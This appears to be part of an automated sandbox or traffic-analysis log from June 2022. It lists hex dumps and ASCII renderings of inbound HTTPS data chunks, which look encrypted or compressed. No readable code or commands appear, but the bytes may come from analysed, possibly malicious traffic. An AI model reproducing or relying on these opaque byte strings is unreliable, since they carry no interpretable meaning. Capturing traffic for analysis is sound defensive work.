                                2022-06-26 07:43:09 UTC490INData Raw: 67 ef 43 5b 46 45 59 48 27 19 fb a7 c8 3e 02 dd 7c 96 2a 86 5c fc 9f f1 ac fb 32 48 fd 6f f1 8f 0e 4e cf 9d 06 ab 74 80 3c b8 12 14 17 ab 26 0c db de 86 bc 66 11 cd 7b e5 83 ff e6 b0 57 2a 2e 59 66 0f 89 79 1b 1e cb 53 1e 45 28 e4 3e f2 2f 13 4a 6b 75 6c ec 44 88 e7 bd 2e 27 e8 e3 27 01 70 fb 57 a1 49 75 67 35 9d 23 7b ad ea 69 45 69 ce 82 b9 3b c3 2e 18 7f 9e f7 2e 87 3d 3c 87 e6 6e 9f 11 27 59 73 01 ae 58 f3 9d 9b e9 05 06 16 d2 f7 c6 14 8e bb 0c d9 39 76 0d ed 42 5a 23 d7 68 b5 4b 65 6b ce e5 ae fe 10 db ca 9a f2 54 a9 e4 47 a9 18 8c ed cc 95 f4 9e 35 35 9c 19 69 e1 74 a2 87 71 9a 3c 2a c7 28 80 43 8c 2b a3 db 1e f1 23 67 22 2d be 5c b1 db 58 b9 28 6e 52 ec fc 36 57 2b 89 3c 95 44 ff a8 ef 42 8e 1a ee a0 52 28 8d f3 c5 de a0 b7 a2 d9 1b 5e 8b 8a bd b5
                                Data Ascii: gC[FEYH'>|*\2HoNt<&f{W*.YfySE(>/JkulD.''pWIug5#{iEi;..=<n'YsX9vBZ#hKekTG55itq<*(C+#g"-\X(nR6W+<DBR(^
                                2022-06-26 07:43:09 UTC493INData Raw: bb 8f a0 bf 0f b5 5d e1 01 30 8c 8d 5f 28 29 03 97 5f 6a 03 bd e6 f7 5a da cc 91 5a 8f c9 2e 46 f0 3d ee 84 4b 32 eb 96 9f 92 41 81 ec 14 32 fd 7a 38 49 41 f6 57 65 16 2a 3d 5e 6d 16 84 b2 99 4f f5 37 88 5c f8 62 07 a9 49 a2 75 81 04 f0 ae 0f b1 cf 9e 06 4b 63 b3 93 7b 10 5a 8e ad 32 a3 1b 78 c9 84 b6 53 1a d6 31 43 19 8b 18 7e c9 ff 0e b7 96 fd 66 f6 2a a9 5a 99 5c 24 2e 66 53 4a 03 e1 95 e4 97 0f be 43 3a 9c cf 32 e0 7f a8 33 e6 65 6d 11 dc 5f 98 74 2f 92 7a 70 00 7c cb 95 bf b0 d8 ce 75 a8 7e fa 61 3c c0 a3 9e 24 90 7d 83 98 9e ff 1a 1f 46 62 17 18 14 d1 32 92 79 27 ff bf 57 73 28 f6 89 93 d3 dc b7 51 26 00 a4 d6 16 d8 21 bb 8c 81 d0 fd 16 1a e1 f0 17 bf 28 b1 b7 7d e8 73 c2 f3 a3 56 01 d6 e5 31 b7 90 a0 ca 30 58 9e 7c f9 02 c1 f1 42 8a ab 7b 12 b1 bb
                                Data Ascii: ]0_()_jZZ.F=K2A2z8IAWe*=^mO7\bIuKc{Z2xS1C~f*Z\$.fSJC:23em_t/zp|u~a<$}Fb2y'Ws(Q&!(}sV10X|B{
                                2022-06-26 07:43:09 UTC497INData Raw: 3b 50 1f 78 a2 b5 c0 3c 5e fd d5 8a bc 01 b7 74 f9 78 05 7d 0c 5b 94 70 33 d7 65 d4 8a 97 38 a0 19 a0 63 a2 b6 92 bc 55 00 de d6 b1 d7 5a 03 28 e5 95 c9 2b 18 26 c3 67 9a d3 ef f3 07 57 27 63 d0 ba 1e 71 2e 00 d1 60 4c fc 20 80 8e 33 54 d3 79 cc f6 fb 77 1f f4 2f 79 4c 09 59 22 b3 bb 75 1b a3 62 11 b4 96 96 d0 3c ed fe f1 da cf 08 5a 87 50 67 44 4e 77 b8 7e 4c c5 ee 20 82 72 ed 77 dd a9 4d f0 e9 ec 7e d2 d9 15 b2 75 26 ab d4 31 14 2b e5 f2 67 2c e5 33 5f 4a b3 7c e1 71 76 58 03 1b 8f 63 57 e5 4b d1 6e fe 84 a6 00 f4 55 b9 2d b1 25 fb 09 b1 6c 1a 6f 61 8c 2b 75 b3 c1 b1 e2 eb fa 86 0e d1 38 c9 10 c6 96 36 ed 43 0b 8e bf 11 76 15 20 33 d3 5a d2 a6 a1 27 86 63 84 08 2e 16 12 fc 47 4f 87 4d 37 d9 ed c2 ed 16 69 3c f5 51 a3 b9 fd 63 36 ee 29 3d 94 0b b7 ec f6
                                Data Ascii: ;Px<^tx}[p3e8cUZ(+&gW'cq.`L 3Tyw/yLY"ub<ZPgDNw~L rwM~u&1+g,3_J|qvXcWKnU-%loa+u86Cv 3Z'c.GOM7i<Qc6)=
                                2022-06-26 07:43:09 UTC501INData Raw: 91 29 62 99 3a 85 d9 c6 48 45 62 c2 a8 bc ac fc 28 c7 82 55 2f f3 c4 4b 10 94 df ef 25 fd d6 48 07 84 a3 d8 60 35 f4 48 6a 21 b4 d8 87 bf fb 1a 6c 55 59 e3 02 ee c6 87 7f 16 97 c4 7f 92 7a ea a9 a2 ad 50 6d 5d 79 32 81 86 e7 71 84 e7 24 0b 3c ad 3a 27 41 fc 69 ac 30 fa 7e a3 2e 0b 81 2e b5 f8 9c e1 71 4b 80 14 55 ea a5 a8 09 4b a4 4e 37 18 65 e7 db 7e de 62 1c 0b 16 3b 9e ae 85 65 8f 06 89 72 c8 3a 30 f5 9a 8a 8e 5c 0e ea 34 44 4c e5 9d a8 b4 f5 13 69 65 e3 e7 02 b9 99 99 31 12 22 96 ea 8e ef 00 ac cf f4 15 08 cb 11 e5 17 dc 52 18 0c 78 00 d7 bf 44 a0 50 e2 39 88 d8 ef 00 8d 22 01 02 00 b1 f2 b8 11 9f d9 7b 36 c1 74 5a 56 f9 65 ca a5 da d5 be 81 a1 20 ae 0a 19 41 ec 6a fb ec 48 ad c8 0a fe 48 cf fb e0 36 4b c9 8e 8b 52 84 e2 5a 93 b7 5c 93 ef e2 9b a8 b5
                                Data Ascii: )b:HEb(U/K%H`5Hj!lUYzPm]y2q$<:'Ai0~..qKUKN7e~b;er:0\4DLie1"RxDP9"{6tZVe AjHH6KRZ\
                                2022-06-26 07:43:09 UTC505INData Raw: d2 39 1c 13 fd d6 f6 e1 e5 3e f6 14 86 48 d9 3d 10 bb b4 4d bd 13 38 be 17 61 97 f9 81 49 b9 fb 67 37 85 62 3f 07 c7 68 53 cc 54 a9 40 a3 db b8 11 30 61 54 ef 89 93 3e 64 fc ea 0c 4a 80 c0 bd 08 3c 75 82 c9 7f 68 7a bc 84 64 d0 ce ba d8 86 6e 25 ed 89 1a 85 35 61 d3 c6 ec 7d 71 5c 0d 9c 0e 11 6f 8b 2f f0 ee 71 95 35 0b b5 fd 4a 1b 42 f4 3e a9 77 5c 33 d1 96 51 89 83 22 64 2f 9b cf e3 bb dd fb c6 01 68 df 9a 52 a2 16 26 ff ef 56 05 86 62 da f9 9b c3 e6 e8 e1 0e d8 15 99 8d fb d1 79 ad 40 0e b9 bb 42 47 46 fd a6 7b f2 50 e9 60 8b a7 f1 6d a0 bb 96 8a 24 1b 79 2b 4b 7a e8 4d 83 b2 32 b6 44 9b ad 00 b6 bc ca 0a be 37 59 f6 55 6d 65 db 99 6e 89 c3 26 fc 06 36 fc 6b 53 55 cc de e2 82 2d 87 47 cd 4d 88 5c 20 48 2a 90 a7 40 7f 52 64 6b 90 ba 35 56 56 14 3c 44 52
                                Data Ascii: 9>H=M8aIg7b?hST@0aT>dJ<uhzdn%5a}q\o/q5JB>w\3Q"d/hR&Vby@BGF{P`m$y+KzM2D7YUmen&6kSU-GM\ H*@Rdk5VV<DR
                                2022-06-26 07:43:09 UTC509INData Raw: 14 8a f6 92 5b 62 7d 46 3c d6 d1 8e 14 92 c1 8e e8 18 48 f3 75 4e 19 67 33 b4 4b b4 92 29 90 e5 92 59 30 c4 28 3d 8f 87 2c 2d 3c 54 79 25 64 c4 2a a1 44 6b dd d6 38 60 b7 e1 9f f1 75 01 6d 9e 8f d9 1f 21 c5 ca 0f 3c 26 5c 0f 50 74 61 38 8a 8e 61 f1 c3 fb cc ff 16 44 7c 6f 3a 8a e6 41 d0 18 f2 ef 2c d7 e3 b0 51 65 b0 d6 00 13 3b 48 27 c9 18 ab 84 5d da 78 a5 f5 c6 4b ec 7c 76 39 0d 8e 9f 15 25 96 3c da 08 0f e8 67 73 51 ff 63 07 64 12 75 6c d0 c0 87 d3 05 27 ff 42 0b a9 57 44 c9 c6 47 29 84 97 0e 26 67 77 e6 2a 7a 58 3c f6 c4 2d 18 7b 4c d9 28 c9 e7 21 b9 40 0b 4b 00 81 4f ad e7 f9 0b 85 2b 95 92 30 95 b6 ad a3 43 10 b6 37 f5 4f 6f c9 c4 8f 71 fa 84 07 18 94 ed 84 84 a7 49 64 30 f4 2d a2 c5 1e 76 fb 6e 45 d8 16 aa 25 4e c7 24 5e 70 42 e1 f3 57 da e3 43 5c
                                Data Ascii: [b}F<HuNg3K)Y0(=,-<Ty%d*Dk8`um!<&\Pta8aD|o:A,Qe;H']xK|v9%<gsQcdul'BWDG)&gw*zX<-{L(!@KO+0C7OoqId0-vnE%N$^pBWC\
                                2022-06-26 07:43:09 UTC514INData Raw: af ee a7 01 73 1a 2e 59 61 c5 f4 20 5d 13 23 e8 74 9e 0b ac 6f 66 41 62 45 ee 3b c8 4b 9b 7b c6 a3 61 90 62 a5 8d ba e2 44 76 12 c4 f9 ef 8b 2f 34 39 dc a4 7a 90 8a b5 42 6e 97 0b 4b 6c 53 38 12 b5 47 37 b3 59 e4 a4 f4 46 61 00 32 3d f2 75 de 00 cf 4f ec 68 88 e6 de 00 1f 42 71 a5 97 b7 4a dc 76 3c db 3d 37 d4 56 23 18 86 61 10 3f 3c a4 86 0b c0 c4 9e 0c ec fc e3 ac b7 85 5a f1 d3 8f 60 d2 c1 87 f7 5e ce e7 9a 6f 2a 57 24 64 58 9c eb 9b 4a c0 29 51 a7 73 0a a8 36 42 11 50 c6 28 b5 ae 76 d8 52 34 47 3c fe c6 31 e6 76 b2 5a 29 41 6a 01 22 18 40 96 20 98 35 66 17 dc a0 ca 1e 2f 49 66 fb 2a 21 41 b9 f8 26 a1 8f 74 f0 1f e0 2d 9d 42 c7 05 d1 61 de dd 4c e4 42 19 76 1c a6 a1 ea 9a 24 51 4c 61 ca 2e 7c 7d 45 10 ed 11 1f dc 66 e8 96 52 02 8c b7 ff 8c ba 98 19 7c
                                Data Ascii: s.Ya ]#tofAbE;K{abDv/49zBnKlS8G7YFa2=uOhBqJv<=7V#a?<Z`^o*W$dXJ)Qs6BP(vR4G<1vZ)Aj"@ 5f/If*!A&t-BaLBv$QLa.|}EfR|
                                2022-06-26 07:43:09 UTC518INData Raw: 5e 55 aa bf b4 ca 34 b4 05 d1 50 0c d2 fc ef db e5 38 38 61 37 e9 d6 35 fb 59 74 4d ba 68 38 f9 69 db 89 f5 1b 05 18 15 2d c7 e6 68 fb 06 4a 0c 1b 4e d0 df 82 3b 81 80 c8 a9 b2 49 87 c1 76 73 f0 9c c3 2f b2 f8 e0 5c 22 d6 1b 0b 88 55 6a 55 2d a3 3a 82 6e d4 18 df 87 66 4d 99 d2 5e be 58 f4 fb cf 70 98 e2 4c 2f 51 0d 57 55 09 0a 6d ff df 04 64 af a8 34 d2 d8 e0 66 8c 6c ac dd a2 24 9d ea 02 5f 1b 84 b5 85 c4 e4 e6 6b 24 26 dd 54 c2 52 c7 c4 0b 77 4c 8e 09 70 b2 b6 05 be 20 6e 79 f2 b7 ab 66 2a 1b 5b 45 95 07 fb 38 b4 ef 40 38 f1 2e 39 eb 21 66 0d 99 87 b2 b4 fc 00 d5 b5 f0 c7 8e d5 f5 9c 58 a2 cd 9c 76 67 30 12 10 47 02 5d 10 f0 e5 9d 2d fa 61 c8 83 52 06 8d d3 3f 1c 90 b6 c3 41 6e a5 c7 f3 28 f3 4c 15 b4 90 0e ca ae c4 5e 1a d6 38 2f 74 7d 7a 79 ca 04 9b
                                Data Ascii: ^U4P88a75YtMh8i-hJN;Ivs/\"UjU-:nfM^XpL/QWUmd4fl$_k$&TRwLp nyf*[E8@8.9!fXvg0G]-aR?An(L^8/t}zy
                                2022-06-26 07:43:09 UTC522INData Raw: 63 5c 5e e0 04 d4 a9 c7 95 e2 96 21 17 4b 1f 0a a0 5f c4 68 6a a9 49 d5 4f c4 05 fa e9 49 22 04 2b f5 cb cd 1e a2 f1 84 a8 28 19 8b 08 ef 7c 5c 02 87 d6 4d 3b 77 75 44 a2 2a e5 79 7c ed 7a 58 f2 5b ce 6a 79 d1 15 b0 97 9a 66 ac 0f 38 a5 b4 de 6f 79 95 87 5a f8 90 e9 c0 22 91 b2 85 31 1a 8e 9b c8 dc 43 52 cc e0 45 ed 61 6c 6c a3 e4 f5 63 a2 99 c4 d5 85 a2 55 cc 26 51 89 61 f0 52 46 57 4d 24 30 2d 48 41 cb ba 80 6a a2 56 07 4f 67 b4 9b a6 77 5a 96 fd ce 9e 31 2b 25 0f ed 02 99 5b f6 09 54 61 3a 34 c3 33 6f 98 ae 46 3e 92 3d 02 e3 e2 ef fa a2 21 77 05 ba 49 b9 7b 19 37 7a 8e 87 e3 6e c0 f4 5d 7c d9 aa 0d 1c 3e 3d ce 3d 39 bf ca 82 9b aa 23 c7 d4 16 e3 57 c8 c1 be 77 8d f2 77 4f c8 18 4a b6 5f 70 4a c2 61 ce 0e 3e 35 da 0c ee 92 f2 25 48 16 85 ba 78 00 e0 da
                                Data Ascii: c\^!K_hjIOI"+(|\M;wuD*y|zX[jyf8oyZ"1CREallcU&QaRFWM$0-HAjVOgwZ1+%[Ta:43oF>=!wI{7zn]|>==9#WwwOJ_pJa>5%Hx
                                2022-06-26 07:43:09 UTC525INData Raw: c0 6a 5f 6c f4 7f 96 38 c7 b9 77 bd 8d 03 cb d5 b5 bc d6 00 ae e0 b3 c1 95 81 b3 ef ae 6b ff 73 4c 89 ac e6 7b c0 5d 1f b4 46 a2 ed 03 fe f4 26 9e 03 f6 ca 73 b6 f9 04 f1 35 64 b7 c3 68 0d 0a b1 90 c2 63 36 29 4d 31 7c 05 0a c3 a6 3b 47 e8 59 1e fd b4 e8 23 48 94 d2 c6 be 74 68 36 b9 28 7c fc 14 30 53 92 11 c3 b9 2f 9e 91 0c e0 fd df 69 d4 55 d7 19 9f e1 99 6b 69 59 50 8b 12 f5 23 cc e6 d5 a2 91 5f 62 d0 b8 52 ba 10 b3 88 ee 3f b0 f2 55 e0 93 4d 2f fc 5c 33 98 29 38 76 e5 0c 80 1c a2 90 15 a6 d4 c0 d3 d6 a2 54 39 ed e3 ff 26 2e c3 e3 41 a5 68 cc ea 66 e1 d1 c8 52 76 19 f8 26 c0 fc 22 ac ce 3d 13 bd d3 31 04 bb 0c f4 f3 c3 34 84 12 1a cf 42 a5 99 01 89 ec c0 bd 67 c4 6d 83 c1 3f 9c 36 7e f8 0d 50 ff d8 a1 4c 62 66 54 d0 1e 47 c7 80 8d 83 78 82 51 ff a6 de
                                Data Ascii: j_l8wksL{]F&s5dhc6)M1|;GY#Hth6(|0S/iUkiYP#_bR?UM/\3)8vT9&.AhfRv&"=14Bgm?6~PLbfTGxQ
                                2022-06-26 07:43:09 UTC529INData Raw: 27 6e 93 54 d4 30 ac 64 c7 ca 2e 58 c5 19 3e ca b6 d4 71 f7 89 de ef 13 52 5c dc 4f 3d 8a 53 e9 04 f5 9e be 71 7f 24 de 47 73 1b 1f 5c 1a cc ba 30 fa 78 dc 7c b2 9c 3d 36 11 d8 22 e2 7e 3f 47 b9 68 80 b5 9a 85 8b b8 d1 e2 3b 24 28 68 d9 d1 c8 a0 64 5b 0d f2 61 f9 18 d0 cb 60 44 b6 2b b8 d9 d0 17 c5 e2 b9 db 77 17 9b 2f f2 27 3f 02 e7 ca b5 21 11 6a 61 cb f8 54 bc 2a 61 ca b2 68 02 8f 39 34 a0 11 6a 47 64 4c 72 b3 3f 6d cc 00 0c a8 34 5c 6b 47 55 ee 9d c7 5e a3 73 86 82 20 a6 ba 6b 1c bd 6d d0 6d a1 10 49 f3 63 ef 40 f9 67 7e 44 6b f1 9d 66 d8 39 8b 2c 8d 06 64 de c5 4d a1 ae d0 1d 4c e8 be 69 c4 7e 88 de 43 fe a0 90 e0 fc d4 eb fb 18 e4 f3 69 a2 2a a4 61 8d cc 31 22 c2 24 19 05 22 d7 c1 7e c1 77 10 43 fc 9e 3c e2 b7 d0 22 32 63 51 08 38 58 4e 50 c2 02 3c
                                Data Ascii: 'nT0d.X>qR\O=Sq$Gs\0x|=6"~?Gh;$(hd[a`D+w/'?!jaT*ah94jGdLr?m4\kGU^s kmmIc@g~Dkf9,dMLi~Ci*a1"$"~wC<"2cQ8XNP<
                                2022-06-26 07:43:09 UTC533INData Raw: 30 32 c8 dc 5e 60 7a ae 30 b8 de aa b9 5a 39 24 00 66 08 54 c8 2c 3c 41 42 f0 5d fa 0c 1b 13 ad ff ec 72 d9 8d bd b8 47 da 20 8d f4 5d e7 82 ad b5 74 7d 1f 2d 0f 82 a3 08 ea 97 c2 9f 23 92 4b 4c 06 4c 4f 53 6a 32 94 90 a4 e7 2f b3 21 51 69 e5 a3 08 9e df a0 8a 52 85 9f a7 12 e2 07 20 4f 8c 16 15 9d c0 19 64 50 1c 6f d1 56 1a 77 cc a4 58 c2 8a 6b ca cf 43 2d 31 0d 56 ab f3 b4 e5 a9 28 dd 62 20 2b 49 12 c2 80 d6 86 9a b6 95 9c d1 98 8a a8 13 0d aa fc e6 32 ff 12 cd 6a db a4 d2 71 52 87 f8 54 b3 42 95 fd a7 39 e8 13 42 6e a5 f8 0c 82 0c 2d 75 6e af 12 9c c8 bc 03 71 b5 e8 47 61 b6 3d e6 ac 10 52 65 cd 57 23 94 18 6a 27 c4 bc 48 7d 5b 6d 1d 19 2a 0c 29 d8 7d 1f 1d eb 8b 94 e3 df d8 d4 73 8b b8 c8 21 d0 75 26 b8 ed 96 a0 16 8b ac 7b 82 1b 16 f4 b2 10 0f c4 d3
                                Data Ascii: 02^`z0Z9$fT,<AB]rG ]t}-#KLLOSj2/!QiR OdPoVwXkC-1V(b +I2jqRTB9Bn-unqGa=ReW#j'H}[m*)}s!u&{
                                2022-06-26 07:43:09 UTC537INData Raw: eb 6d 09 d5 0d 5f 06 74 6a 69 d7 f7 dc 3f c4 bb 2b bb 7a 08 06 35 51 8e 37 b8 4b 6c 3a f9 6b fa 75 82 f8 8c 25 7d 5e ff a5 50 ab f6 0d 5e 89 f0 c4 59 34 17 76 78 d2 90 57 8f 0b ca 09 c2 5b 16 13 74 5f b2 3b 07 66 d8 61 e3 4b ac 00 c8 a0 78 f9 fb 8c f0 cb 82 8c 4b 33 a4 f0 b4 2a 7f 69 f3 8d 89 03 3f 20 e0 2a a7 f7 1a f4 df 45 2c 58 1d 6e 48 1e 7e c9 c6 72 6e c1 85 04 59 8d 4c f2 c5 98 fa 52 e2 f2 ef fe 01 b7 e1 28 9f 02 10 42 a8 48 8e 11 13 2d 0a 1c ee 27 64 6b 47 2c e4 8a bb 54 3c 1e c3 1e ee 01 19 31 09 cc 6a f5 e5 3b a1 44 7e 38 0b 5a 01 27 4e 56 2f a8 3f 68 f1 f7 46 b9 fd 59 2c 8d 9f a9 e1 2c 35 bd 99 4b 39 77 09 e4 e0 aa b2 46 3f 15 a7 19 4b 9c a5 54 93 6c 8e c7 6f 5d bc 30 91 bb 40 1e 6b 88 31 b5 df 1f de 48 0c 06 c5 0b 19 50 2d e1 90 71 d7 5c 9f 2c
                                Data Ascii: m_tji?+z5Q7Kl:ku%}^P^Y4vxW[t_;faKxK3*i? *E,XnH~rnYLR(BH-'dkG,T<1j;D~8Z'NV/?hFY,,5K9wF?KTlo]0@k1HP-q\,
                                2022-06-26 07:43:09 UTC541INData Raw: 6c bc be 43 ba 80 4a 55 1d d0 2c 51 54 a9 84 72 85 1d c6 a9 30 b1 aa 88 f2 7e fe f6 2d 88 d2 f2 7b 12 9e 7a db 6a 01 7f f0 25 89 c3 70 60 bd 4b 9f 2a e1 d5 5c f4 60 39 37 dd f0 da 02 e3 a3 23 89 48 ee a1 04 44 5c 62 c1 38 99 93 05 cc 2a bd c4 db 59 81 95 42 40 0f 04 12 0f cf 83 09 d4 7e 6a 0a 42 d0 18 42 e3 f7 03 fe 94 42 b4 c6 41 d0 b0 47 1c 8c 00 2a d7 7c 71 db 8f ad 3a 64 0a 91 5e 27 6c 12 de 48 56 72 28 ab 8b 0c 62 75 ef 01 51 0a 0c f1 5a d5 86 44 a3 97 f3 60 d3 79 70 8f 0a b5 d6 71 18 a1 a5 52 92 b5 35 0a 37 22 cd 2a 31 29 22 30 de 1a a1 3f b2 b8 e6 51 a2 45 74 bc c1 02 cb e8 96 6b b1 19 0f d6 d8 6d 6d 6b 40 f1 15 7c de e3 31 1b c8 a9 d1 5c ea e8 ad 88 d7 11 f4 69 cd 53 64 93 25 b4 f6 cd 28 ef b7 40 ef be 32 1f d8 53 56 c1 9a ae de bc 4f e0 01 c0 fa
                                Data Ascii: lCJU,QTr0~-{zj%p`K*\`97#HD\b8*YB@~jBBBAG*|q:d^'lHVr(buQZD`ypqR57"*1)"0?QEtkmmk@|1\iSd%(@2SVO
                                2022-06-26 07:43:09 UTC546INData Raw: c6 6d 0c fa 29 c1 70 1b 51 bc 48 f5 81 62 00 28 17 11 89 11 cb 29 6d 0e cd 92 25 bd 66 2a a6 a0 00 5a cd 29 57 7b db 19 25 77 80 17 9a 18 28 14 2c da 24 fd 9b b0 54 a4 09 1e cb 12 f7 bd 41 7c 64 74 3c c9 3d 3b 5c cf ab 90 91 de 54 5d 09 06 34 ea 36 d7 9c 50 c4 4b f0 29 96 e0 ac 4e 6f b4 41 30 10 3d 0d 0d 37 d0 49 8d 85 65 1b 11 8e 8a 98 e0 72 5e 4d d8 dd 4e 50 d1 20 f4 5e 6f 44 09 43 f7 bb 35 48 19 ca 4e cf 69 ef fe e8 0a 22 d4 ca 0c 15 ea c0 b6 73 46 b5 6e 88 18 c8 5f e9 af 85 50 81 dd 7b 11 d9 f0 20 d6 e3 f8 d7 07 62 e7 2d e3 13 fa d4 91 59 2c c6 cd a1 51 d0 49 e9 ca 52 e8 6f 0c a0 82 2b 65 b9 eb f5 0d aa 10 c0 d6 98 ea 73 13 53 a8 33 c7 e5 ae 2a 3c ba 56 62 6c f9 d2 90 a5 e0 4e a5 44 d0 3a f8 15 5a 9d 70 3e c8 5d 12 c6 50 88 3c a1 4a 11 fd d7 8e e4 7b
                                Data Ascii: m)pQHb()m%f*Z)W{%w(,$TA|dt<=;\T]46PK)NoA0=7Ier^MNP ^oDC5HNi"sFn_P{ b-Y,QIRo+esS3*<VblND:Zp>]P<J{
                                2022-06-26 07:43:09 UTC557INData Raw: 10 75 0a 59 57 81 33 0a 5e 71 c5 49 d7 50 03 12 fa d5 95 b4 f3 9f 98 93 39 02 6a af aa 72 87 c6 cb a5 b1 f8 f7 5b 2f 15 e5 7b 4e 1c 7e c0 71 f0 5b 2a b5 ee a5 89 70 99 16 0d cf fb e2 cb ac b1 f1 ad c3 2f fe 2a 1b 8e 4e 03 1e 7b 24 0b 3e e5 11 ce f1 e3 d3 c4 bf 49 c9 74 73 37 69 4a 65 d1 70 87 18 f5 41 98 85 ba d7 1e cc 70 a0 b9 45 79 9d ba 84 76 c3 03 c5 f3 25 53 89 d1 e3 7e cc 28 63 3e 57 27 82 b5 05 19 36 9f ca 6a 22 07 7e 93 ca fe 11 ec 46 46 27 a5 23 4c 66 e9 9d e1 53 2b 6f 93 e3 bd 1d 1b 57 c2 5f 8b 24 bb 45 39 ce f2 44 ce b9 85 ea 9b ab e8 82 8c f5 ed e6 59 dd 92 b3 8d 20 bd b1 0a 4b 6a 63 a3 6d ac 8c e5 d4 70 05 ba db 7b ab 38 57 cc 89 c2 31 76 b7 43 4c 39 bd c5 46 64 9b d6 fc 68 62 4e ee 11 2d 80 6b d7 aa 73 19 83 8d 60 59 68 f9 bb 8d a9 05 63 ec
                                Data Ascii: uYW3^qIP9jr[/{N~q[*p/*N{$>Its7iJepApEyv%S~(c>W'6j"~FF'#LfS+oW_$E9DY Kjcmp{8W1vCL9FdhbN-ks`Yhc
                                2022-06-26 07:43:09 UTC562INData Raw: 31 76 44 1c c2 43 1f 51 2d 76 31 ef 22 c1 34 3d d4 96 16 30 5d 12 54 f1 8e 42 29 4f 8c 0d bc ea 8f fd d5 b8 22 4a 4f 04 c2 84 5d 55 ef 87 06 b8 b5 fa 9c 2e 03 8a 4f 90 04 97 12 aa d0 d6 df 6c d5 e6 0b dc 2b 03 c4 93 1f 74 06 76 07 24 72 7e 50 fc 03 f9 b2 fb b3 a0 40 34 1b 99 8b f1 3b 11 9d 77 f3 86 12 04 77 4f b8 69 ec f4 bd 50 8b 25 c7 40 9f 85 88 fa 12 f3 94 5f d3 07 69 1b 20 38 9f db 15 95 8f 2c 13 42 f5 20 8c bd 54 57 80 7d bd 2d ba e1 3a d7 9b c2 1d bc 5a fb 0b f1 e9 68 38 60 e0 97 36 6a ca 67 45 ec 2b 8f e5 f5 c8 f3 6b b2 30 33 34 ce bd e0 39 e6 5b 30 fa f2 16 46 a2 c9 f9 7d f5 62 31 04 23 72 c3 f5 4c 8b 9b 44 b3 ba d3 5c b1 2d ff 43 a3 6d 77 cd e5 76 af 01 be 72 bf d6 a6 b0 ec ef 74 cd 9f 57 96 5a 7f b3 df 37 ae c3 96 6f 18 fa 6d 3c fd 75 c0 02 f3
                                Data Ascii: 1vDCQ-v1"4=0]TB)O"JO]U.Ol+tv$r~P@4;wwOiP%@_i 8,B TW}-:Zh8`6jgE+k0349[0F}b1#rLD\-CmwvrtWZ7om<u
                                2022-06-26 07:43:09 UTC578INData Raw: 73 bc ae fc a3 a2 31 be ad 92 38 fd 67 a5 e6 72 92 1a 64 35 ea 8c 45 d1 45 a3 e7 1f b9 a9 a6 0a 92 39 d9 0f 91 3c bc e0 00 a6 ca bd e1 72 00 7e 46 5b d9 00 7e b4 70 85 66 a2 c8 72 e9 44 f2 2c 74 51 e2 fe 5c 79 6c 07 ea d4 ab cb d4 3b fe 80 7d 9e 94 37 57 40 a3 40 31 45 45 33 00 f2 2c b1 d1 e8 7b c6 fa 44 53 3d af d2 36 3e 07 76 d6 d2 81 d7 02 74 64 7e 29 0e ca 6f be 57 40 7c c9 21 3c 1d 16 a2 d4 3f 9f dd 70 6f 67 87 6f e3 1c e1 0e de ea 0c 14 1a 97 ed dd 34 66 44 45 92 e6 60 36 63 8b c0 a4 2a e7 2b 7c c2 a0 11 3c 78 67 2e 09 5e 32 2e 96 d6 e5 44 d2 1b 49 51 61 b7 e6 f2 3c 35 47 90 0a c7 5a 98 27 fe b8 57 a5 f6 1f 5c f1 e3 b5 d6 e7 bb 19 61 39 9b ce ff 6b f8 2b af 26 8e c6 db ce f5 6a 50 8b 4e 2c 60 9e e6 a3 d1 70 e2 e2 b2 9a b1 aa 4e c2 c1 55 ab 3a 7d f2
                                Data Ascii: s18grd5EE9<r~F[~pfrD,tQ\yl;}7W@@1EE3,{DS=6>vtd~)oW@|!<?pogo4fDE`6c*+|<xg.^2.DIQa<5GZ'W\a9k+&jPN,`pNU:}
                                2022-06-26 07:43:09 UTC589INData Raw: f0 55 d2 a4 ba 6b 88 7a 67 59 ec f4 69 5a df e8 0c 85 d7 4d 37 55 73 9e 36 93 19 0a 7f d4 b1 a8 22 fb ef cd a0 75 bd cd 1d 94 1d 67 6d 63 91 97 7a 0d 8c 33 45 45 48 94 e3 ad 35 76 a1 9c 8e cc 68 76 11 f6 1d 89 1b 8a 9a c7 2d 5b 3f db 49 21 02 20 9d 75 1e b7 87 55 bd e4 da 4b b3 8a aa 23 ab 36 68 4e fd 5c 74 d8 a1 e6 36 36 51 75 58 9f 0a 77 29 0d c0 b0 11 6a ba 3e 26 69 8d 7f 4c 68 72 ca 61 44 92 22 81 6d f2 01 5e 82 88 13 cb f2 e7 91 c4 d0 6f dd 7a 9c 6f b6 53 40 61 8f 79 85 dd c9 fa 9e 3b 9d 11 32 87 45 60 3c 84 30 1d fd b1 77 21 9d 6c f3 3b 80 75 a0 60 d1 fc c0 3f 94 58 d2 f9 01 4e 5a 04 b5 36 32 72 01 9b 9b b9 60 61 c2 97 bc e7 db 38 f8 f7 35 49 fa e5 91 06 9d 9d a1 95 28 0f c4 61 04 95 00 a9 00 c9 57 d3 13 a5 bd 7f 3c 08 4c b9 c8 58 ea 58 7c 64 29 20
                                Data Ascii: UkzgYiZM7Us6"ugmcz3EEH5vhv-[?I! uUK#6hN\t66QuXw)j>&iLhraD"m^ozoS@ay;2E`<0w!l;u`?XNZ62r`a85I(aW<LXX|d)
                                2022-06-26 07:43:09 UTC605INData Raw: 77 9b 55 55 00 4a 77 2e 79 0a 30 34 32 7d 55 55 77 4a 2e 77 89 8b 2e 77 75 4a 85 34 32 7d 79 4a 89 4f 00 75 4a 77 9b 55 55 00 4a 77 2e 79 0a 30 34 32 7d 55 55 77 4a 2e 77 89 8b 2e 77 75 4a 34 32 7d 79 4a 89 4f 00 75 4a 77 9b 55 55 00 4a 77 2e 79 0a 30 34 32 7d 55 55 77 4a 2e 77 89 8b 2e 77 75 4a 85 34 32 7d 79 4a 89 4f 00 75 4a 77 9b 55 55 00 4a 77 2e 79 0a 30 34 32 7d 55 55 77 4a 2e 77 89 8b 2e 77 75 4a 34 32 7d 79 4a 89 4f 00 75 4a 77 9b 55 55 00 4a 77 2e 79 0a 30 34 32 7d 55 55 77 4a 2e 77 89 8b 2e 77 75 4a 3c 85 8d 75 75 1c 69 69 24 73 22 7d 7d 75 1c 69 69 24 73 22 75 1c 69 69 24 73 22 7d 7d 75 1c 69 69 24 73 22 75 1c 69 69 24 73 22 7d 7d 75 1c 69 69 24 73 22 75 1c 69 69 24 73 22 7d 7d 75 1c 69 69 24 73 22 75 1c 69 69 24 73 22 7d 7d 75 1c 69 69 24 73
